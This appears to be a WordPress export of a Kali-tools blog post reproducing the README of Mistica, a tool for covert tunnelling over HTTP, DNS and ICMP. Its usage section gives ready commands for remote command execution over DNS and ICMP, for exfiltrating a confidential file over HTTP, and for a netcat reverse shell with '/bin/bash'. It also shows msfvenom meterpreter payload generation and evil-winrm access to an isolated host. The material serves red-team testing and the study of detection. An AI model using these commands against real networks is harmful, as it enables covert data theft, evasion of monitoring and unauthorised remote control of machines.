{"id":11189,"date":"2020-08-11T07:51:03","date_gmt":"2020-08-11T02:21:03","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=11189"},"modified":"2020-08-11T07:51:03","modified_gmt":"2020-08-11T02:21:03","slug":"mistica","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/mistica\/","title":{"rendered":"Mistica : Swiss Army Knife For Arbitrary Communication Over Application Protocols"},"content":{"rendered":"\n<p><strong>Mistica<\/strong> is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary communications. Currently, encapsulation into HTTP, DNS and ICMP protocols has been implemented, but more protocols are expected to be introduced in the near future.<\/p>\n\n\n\n<p>It has a modular design, built around a custom transport protocol, called SOTP: Simple Overlay Transport Protocol. Data is encrypted, chunked and put into SOTP packets. SOTP packets are encoded and embedded into the desired field of the application protocol, and sent to the other end.<\/p>\n\n\n\n<p>The goal of the SOTP layer is to offer a generic binary transport protocol, with minimal overhead. SOTP packets can be easily hidden or embeddeded into legitimate application protocols. Also SOTP makes sure that packets are received by the other end, encrypts the data using RC4 (this may change in the future), and makes sure that information can flow in both ways transparently, by using a polling mechanism.<\/p>\n\n\n\n<p>Modules interact with the SOTP layer for different purposes:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Wrap modules or Wrappers: These modules encode \/ decode SOTP packets from \/ into application layer protocols<\/li><li>Overlay modules: These Modules ccommunicate over the SOTP channel. Examples are: io redirection (like netcat), shell (command execution), port forwarding\u2026<\/li><\/ul>\n\n\n\n<p>Wrapper and overlay modules work together in order to build custom applications, e.g input redirection over DNS or remote port forwarding over HTTP.<\/p>\n\n\n\n<p>M\u00edstica\u2019s modular design allows for easy development of new modules. Also, the user can easily fork current modules in order to use some custom field or encoding or modify the behavior of an overlay module.<\/p>\n\n\n\n<p>There are two main pieces of sofware:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>M\u00edstica server (<code>ms.py<\/code>): Uses modules that act as the server of the desired application layer protocol (HTTP, DNS, ICMP&#8230;). It is also designed in a way that will allow for multiple servers, wrappers and overlays to be run at the same time, with just one instance of <code>ms.py<\/code>, although this feature is not fully implemented yet.<\/li><li>M\u00edstica client (<code>mc.py<\/code>): Uses modules that act as the client of the desired applicarion layer protocol (HTTP, DNS, ICMP&#8230;). It can only use one overlay and one wrapper at the same time.<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Demos<\/strong><\/p>\n\n\n\n<p>You can see some M\u00edstica demos in the following <a href=\"https:\/\/www.youtube.com\/playlist?list=PLyUtb47GNF9wqIwI1DGpX_Fr1IXpXHRqB\">playlist<\/a><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Dependencies<\/strong><\/p>\n\n\n\n<p>The project has very few dependencies. Currently:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>M\u00edstica Client needs at least Python 3.7<\/li><li>M\u00edstica Server needs at least Python 3.7 and <code>dnslib<\/code>.<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>python3.7 -m pip install pip &#8211;user <br>pip3.7 install dnslib &#8211;user<\/strong> <\/p>\n\n\n\n<p>If you don&#8217;t want to install python on your system, you can use one of the following portable versions:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.anaconda.com\/distribution\/#download-section\">https:\/\/www.anaconda.com\/distribution\/#download-section<\/a> (for Windows, Linux and macOS)<\/li><li><a href=\"https:\/\/github.com\/winpython\/winpython\/releases\/tag\/2.1.20190928\">https:\/\/github.com\/winpython\/winpython\/releases\/tag\/2.1.20190928<\/a> (only for Windows)<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Current Modules<\/strong><\/p>\n\n\n\n<p>Overlay modules:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code>io<\/code>: Reads from stdin, sends through SOTP connection. Reads from SOTP connection, prints to stdout<\/li><li><code>shell<\/code>: Executes commands recieved through the SOTP connection and returns the output. Compatible with io module.<\/li><li><code>tcpconnect<\/code>: Connects to TCP port. Reads from socket, sends through SOTP connection. Reads from SOTP connection, sends through socket.<\/li><li><code>tcplisten<\/code>: Binds to TCP port. Reads from socket, sends through SOTP connection. Reads from SOTP connection, sends through socket.<\/li><\/ul>\n\n\n\n<p>Wrap modules:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code>dns<\/code>: Encodes\/Decodes data in DNS queries\/responses using different methods<\/li><li><code>http<\/code>: Encodes\/Decodes data in HTTP requests\/responses using different methods<\/li><li><code>icmp<\/code>: Encodes\/Decodes data in ICMP echo requests\/responses on data section<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Usage<\/strong><\/p>\n\n\n\n<p><code>ms.py<\/code>: M\u00edstica Server<\/p>\n\n\n\n<p>Here&#8217;s how the help message looks like:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">usage: ms.py [-h] [-k KEY] [-l LIST] [-m MODULES] [-w WRAPPER_ARGS]<br>[-o OVERLAY_ARGS] [-s WRAP_SERVER_ARGS]<br><br>Mistica server. Anything is a tunnel if you&#8217;re brave enough. Run without<br>parameters to launch multi-handler mode.<br><br>optional arguments:<br>-h, &#8211;help show this help message and exit<br>-k KEY, &#8211;key KEY RC4 key used to encrypt the comunications<br>-l LIST, &#8211;list LIST Lists modules or parameters. Options are: all,<br>overlays, wrappers, ,<br>-m MODULES, &#8211;modules MODULES<br>Module pair in single-handler mode. format:<br>&#8216;overlay:wrapper&#8217;<br>-w WRAPPER_ARGS, &#8211;wrapper-args WRAPPER_ARGS<br>args for the selected overlay module (Single-handler<br>mode)<br>-o OVERLAY_ARGS, &#8211;overlay-args OVERLAY_ARGS<br>args for the selected wrapper module (Single-handler<br>mode)<br>-s WRAP_SERVER_ARGS, &#8211;wrap-server-args WRAP_SERVER_ARGS<br>args for the selected wrap server (Single-handler<br>mode)<br>-v, &#8211;verbose Level of verbosity in logger (no -v None, -v Low, -vv<br>Medium, -vvv High)<\/p>\n\n\n\n<p>There are two main modes in M\u00edstica Server:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Single Handler Mode<\/strong>: When <code>ms.py<\/code> is launched with parameters, it allows a single overlay modoule interacting with a single wrapper module.<\/li><li><strong>Multi-handler Mode:<\/strong> (Not published yet) When <code>ms.py<\/code> is run without parameters, the user enters an interactive console, where multiple overlay and wrapper modules may be launched. These modules will be able to interact with each other, with few restrictions.<\/li><\/ul>\n\n\n\n<p><code>mc.py<\/code>: M\u00edstica client<\/p>\n\n\n\n<p>Here&#8217;s how the help message looks like:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">usage: mc.py [-h] [-k KEY] [-l LIST] [-m MODULES] [-w WRAPPER_ARGS]<br>[-o OVERLAY_ARGS]<br><br>Mistica client.<br><br>optional arguments:<br>-h, &#8211;help show this help message and exit<br>-k KEY, &#8211;key KEY RC4 key used to encrypt the comunications<br>-l LIST, &#8211;list LIST Lists modules or parameters. Options are: all,<br>overlays, wrappers, ,<br>-m MODULES, &#8211;modules MODULES<br>Module pair. Format: &#8216;overlay:wrapper&#8217;<br>-w WRAPPER_ARGS, &#8211;wrapper-args WRAPPER_ARGS<br>args for the selected overlay module<br>-o OVERLAY_ARGS, &#8211;overlay-args OVERLAY_ARGS<br>args for the selected wrapper module<br>-v, &#8211;verbose Level of verbosity in logger (no -v None, -v Low, -vv<br>Medium, -vvv High)<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Parameters<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code><strong>-l, --list<\/strong><\/code> is used to either list <code>all<\/code> modules, only list one type: (<code>overlays<\/code> or <code>wrappers<\/code>) or list the parameters that a certain module can accept through <code>-o<\/code>, <code>-w<\/code> or <code>-s<\/code>.<\/li><li><code><strong>-k, --key<\/strong><\/code> is used to specify the key that will be used to encrypt the overlay communication. This must be the same in client and server and is currently mandatory. This may change in the future if secret-sharing schemes are implemented.<\/li><li><code><strong>-m, --modules<\/strong><\/code> is used to specify which module pair do you want to use. You must use the following format: <strong>overlay_module<\/strong> + <strong>:<\/strong> + <strong>wrap_module<\/strong>. This parameter is also mandatory.<\/li><li><code><strong>-w, --wrapper-args<\/strong><\/code> allows you to specify a particular configuration for the wrap module.<\/li><li><code><strong>-o, --overlay-args<\/strong><\/code> allows you to specify a particular configuration for the overlay module.<\/li><li><code><strong>-s, --wrap-server-args<\/strong><\/code> is only present on <code>ms.py<\/code>. It allows you to specify a particular configuration for the wrap server. Each wrap module has a dependency on a wrap server, and both configurations can be tuned<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Examples &amp; Advanced use<\/strong><\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Remember that you can see all of the accepted parameters of a module by typing <code><strong>-l &lt;module_name&gt;<\/strong><\/code> (e.g <code><strong>.\/ms.py -l dns<\/strong><\/code>). Also remember to use a long and complex key to protect your communications!<\/p><\/blockquote>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>HTTP<\/strong><\/p>\n\n\n\n<p>In order to illustrate the different methods of HTTP encapsulation, the IO redirection overlay module (<code>io<\/code>) will be used for every example.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>HTTP GET method with b64 encoding in the default URI, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in the default URI, <strong>specifying IP address and port<\/strong>.<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 10000\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 10000\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in <strong>custom URI<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--uri \/?token=\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--uri \/?token=\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in <strong>custom header<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--header laravel_session\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--header laravel_session\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in default field, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom header<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --header Authorization\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --header Authorization\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom field<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom field, with custom packet size, custom retries, custom timeout and sepcifying IP and port<\/strong>:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data --max-size 30000 --max-retries 10\" -s \"--hostname 0.0.0.0 --port 8088 --timeout 30\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data --max-size 30000 --max-retries 10 --poll-delay 10 --response-timeout 30 --hostname x.x.x.x --port 8088\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom field<\/strong>, <strong>using a custom error template<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\" -s \"--error-file \/tmp\/custom_error_template.html --error-code 408\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in the default URI, using <strong>custom HTTP response code<\/strong> and using localhost and port 8080 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k test -w \"--success-code 302\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k test -w \"--success-code 302\"<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>DNS<\/strong><\/p>\n\n\n\n<p>In order to illustrate the different methods of DNS encapsulation, the IO redirection overlay module (<code>io<\/code>) will be used for every example.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>TXT query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\"<\/strong><\/code><\/li><\/ul><\/li><li>NS query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries NS\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query NS\"<\/strong><\/code><\/li><\/ul><\/li><li>CNAME query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries CNAME\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query CNAME\"<\/strong><\/code><\/li><\/ul><\/li><li>MX query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries MX\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query MX\"<\/strong><\/code><\/li><\/ul><\/li><li>SOA query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries SOA\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query SOA\"<\/strong><\/code><\/li><\/ul><\/li><li>TXT query, using localhost and port 5353 (default values) and <strong>custom domains<\/strong>:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--domains mistica.dev sotp.es\"<\/strong><\/code><\/li><li>M\u00edstica Client:<ul><li><code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--domain sotp.es\"<\/strong><\/code><\/li><li><code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--domain mistica.dev\"<\/strong><\/code><\/li><\/ul><\/li><\/ul><\/li><li>TXT query, specifying port and hostname:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -s \"--hostname 0.0.0.0 --port 1337\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 1337\"<\/strong><\/code><\/li><\/ul><\/li><li>TXT query, using multiple subdomains:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--multiple --max-size 169\"<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>ICMP<\/strong><\/p>\n\n\n\n<p>The Linux kernel, when it receives an icmp echo request package, by default automatically responds with an icmp echo reply package (without giving us any option to reply). That&#8217;s why we have to disable icmp responses to be able to send our own with data that differs from that sent by the client. To do this, we do the following:<\/p>\n\n\n\n<p>Disable automatic icmp responses by the kernel (<em>root required<\/em>) editing <code>\/etc\/sysctl.conf<\/code> file:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Add the following line to your \/etc\/sysctl.conf:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">net.ipv4.icmp_echo_ignore_all=1\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Then, run: <code>sysctl -p<\/code> to take effect.<\/li><\/ul>\n\n\n\n<p>Now, in order to illustrate the different methods of ICMP encapsulation, the IO redirection overlay module (<code>io<\/code>) will be used for every example.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>ICMP Data Section, using interface eth0:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:icmp -k \"rc4testkey\" -s \"--iface eth0\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:icmp -k \"rc4testkey\" -w \"--hostname x.x.x.x\"<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Shell &amp; IO<\/strong><\/p>\n\n\n\n<p>You can get remote command execution using m\u00edstica over a custom channel, by combining <code>io<\/code> and <code>shell<\/code> modules. Examples:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Executing commands on client system over DNS using TXT query.<ul><li>M\u00edstica Server: <code><strong>sudo .\/ms.py -m io:dns -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 53\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m shell:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 53\"<\/strong><\/code><\/li><\/ul><\/li><li>Executing commands on server system over HTTP using GET requests:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m shell:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 8000\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 8000\"<\/strong><\/code><\/li><\/ul><\/li><li>Executing commands on client system over ICMP:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:icmp -k \"rc4testkey\" -s \"--iface eth0\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m shell:icmp -k \"rc4testkey\" -w \"--hostname x.x.x.x\"<\/strong><\/code><\/li><\/ul><\/li><li>Exfiltrating files via HTTP using the IO module and redirect operators:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -s \"--hostname 0.0.0.0 --port 80\" -k \"rc4testkey\" -vv &gt; confidential.pdf<\/strong><\/code><\/li><li>M\u00edstica Client (<strong>important to run from the cmd<\/strong>): <code><strong>type confidential.pdf | E:\\Mistica\\WPy64-3741\\python-3.7.4.amd64\\python.exe .\\mc.py -m io:http -w \"--hostname x.x.x.x --port 80\" -k \"rc4testkey\" -vv<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Port forwarding with tcpconnect and tcplisten<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Remote port forwarding (seen from server) over HTTP. Address <code><strong>127.0.0.1:4444<\/strong><\/code> on the client will be forwarded to address <code><strong>127.0.0.1:5555<\/strong><\/code> on the server. There must be already something listening on <code>5555<\/code>.<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m tcpconnect:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 5555\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcplisten:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><\/ul><\/li><li>Local port forwarding (seen from server) over DNS. Address <code>127.0.0.1:4444<\/code> on the server will be forwarded to address <code>127.0.0.1:5555<\/code> on the client. There must be already something listening on <code>5555<\/code>.<ul><li>M\u00edstica Server: <code><strong>sudo .\/ms.py -m tcplisten:dns -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcpconnect:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 5555\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP reverse shell using netcat on linux client.<ul><li>Netcat Listener (on server): <strong><code>nc -nlvp 5555<\/code><\/strong><\/li><li><strong>M\u00edstica Server: <code>.\/ms.py -m tcpconnect:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 5555\"<\/code><\/strong><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcplisten:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><li>Netcat Shell (on linux client): <code><strong>ncat -nve \/bin\/bash 127.0.0.1 4444<\/strong><\/code><\/li><\/ul><\/li><li>Running <code><strong>meterpreter_reverse_tcp<\/strong><\/code> (linux) over DNS using port forwarding. Payload generated with <code><strong>msfvenom -p linux\/x64\/meterpreter_reverse_tcp LPORT=4444 LHOST=127.0.0.1 -f elf -o meterpreter_reverse_tcp_localhost_4444.bin<\/strong><\/code><ul><li>Run <code>msfconsole<\/code> on server and launch handler with: <code>handler <strong>-p linux\/x64\/meterpreter_reverse_tcp -H 127.0.0.1 -P 5555<\/strong><\/code><\/li><li>M\u00edstica Server: <code><strong>sudo .\/ms.py -m tcpconnect:dns -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 5555\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcplisten:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><li>Run meterpreter on client: <code><strong>.\/meterpreter_reverse_tcp_localhost_4444.bin<\/strong><\/code><\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/Hackplayers\/evil-winrm\">EvilWinrm<\/a> over ICMP using a jumping machine to access an isolated machine.<ul><li>Mistica Server: <code><strong>.\/ms.py -m tcplisten:icmp -s \"--iface eth0\" -k \"rc4testkey\" -o \"--address 127.0.0.1 --port 5555 --persist\" -vv<\/strong><\/code><\/li><li>Mistica Client: <code><strong>python.exe .\\mc.py -m tcpconnect:icmp -w \"--hostname x.x.x.x\" -k \"rc4testkey\" -o \"--address x.x.x.x --port 5985 --persist\" -vv<\/strong><\/code><\/li><li>EvilWinrm Console (on C2 machine): <code><strong>evil-winrm -u Administrador -i 127.0.0.1 -P 5555<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Docker<\/strong><\/p>\n\n\n\n<p>A Docker image has been created for local use. This avoids us having to install Python or dnslib only if we want to test the tool, it is also very interesting for debug or similar because we avoid the noise generated by other local applications. To build it we simply follow these steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>First build image with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker build &#8211;tag mistica:latest .\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Second, create the network with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker network create misticanw\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Third run the server with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker run &#8211;network misticanw &#8211;sysctl net.ipv4.icmp_echo_ignore_all=1 -v $(pwd):\/opt\/Mistica -it mistica \/bin\/bash\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Fourth run the client with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker run &#8211;network misticanw -v $(pwd):\/opt\/Mistica -it mistica \/bin\/bash\n<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Future Work<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Transparent Diffie-Hellman key generation for SOTP protocol<\/li><li>Payload Generator: Instead of using <code>.\/mc.py<\/code>, this will allow generating specific and minimalistic standalone binary clients with hardcoded parameters.<\/li><li>Multi-Handler mode: Interactive mode for <code>ms.py<\/code>. This will let the user combine more than one overlay with more than one wrapper and more than one wrap module per wrap server.<\/li><li>Module development documentation for custom module development. This is discouraged right now as module specification is still under development.<\/li><li>Next modules:<ul><li>HTTPS wrapper<\/li><li>SMB wrapper<\/li><li>RAT and RAT handler overlay<\/li><li>SOCKS proxy and dynamic port forwarding overlay<\/li><li>File Transfer overlay<\/li><\/ul><\/li><li>Custom HTTP templates for more complex encapsulation<\/li><li>SOTP protocol specification documentation for custom clients or servers. This is discouraged right now as the protocol is still under development.<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Authors &amp; License<\/strong><\/p>\n\n\n\n<p>This project has been developed by Carlos Fern\u00e1ndez S\u00e1nchez and Ra\u00fal Caro Teixid\u00f3. The code is released under the GNU General Public License v3.<\/p>\n\n\n\n<p>This project uses third-party open-source code, particularly:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/scott-griffiths\/bitstring\">Bitstring<\/a> developed by Scott Griffiths.<\/li><li><a href=\"https:\/\/github.com\/DavidBuchanan314\/rc4\">A RC4 binary-safe<\/a> developed by David Buchanan.<\/li><li><a href=\"https:\/\/github.com\/vlasebian\/simple-dns-client\">A DNS Client without dependencies<\/a> developed by Vlad Vitan.<\/li><li><a href=\"https:\/\/github.com\/rcaroncd\/ICMPack\/\">A ICMP Server and Client without dependencies<\/a> developed by Raul Caro.<\/li><\/ul>\n\n\n\n<div class=\"wp-block-buttons aligncenter is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/IncideDigital\/Mistica\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary communications. Currently, encapsulation into HTTP, DNS and ICMP protocols has been implemented, but more protocols are expected to be introduced in the near future. It has a modular design, built around [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16458,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","fifu_image_alt":"Mistica : Swiss Army Knife For Arbitrary Communication Over Application Protocols","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[2090,3284,3285],"class_list":["post-11189","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-mistica","tag-swiss-army","tag-swiss-army-knife-2"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mistica : Swiss Army Knife For Arbitrary Communication<\/title>\n<meta name=\"description\" content=\"Mistica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/mistica\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mistica : 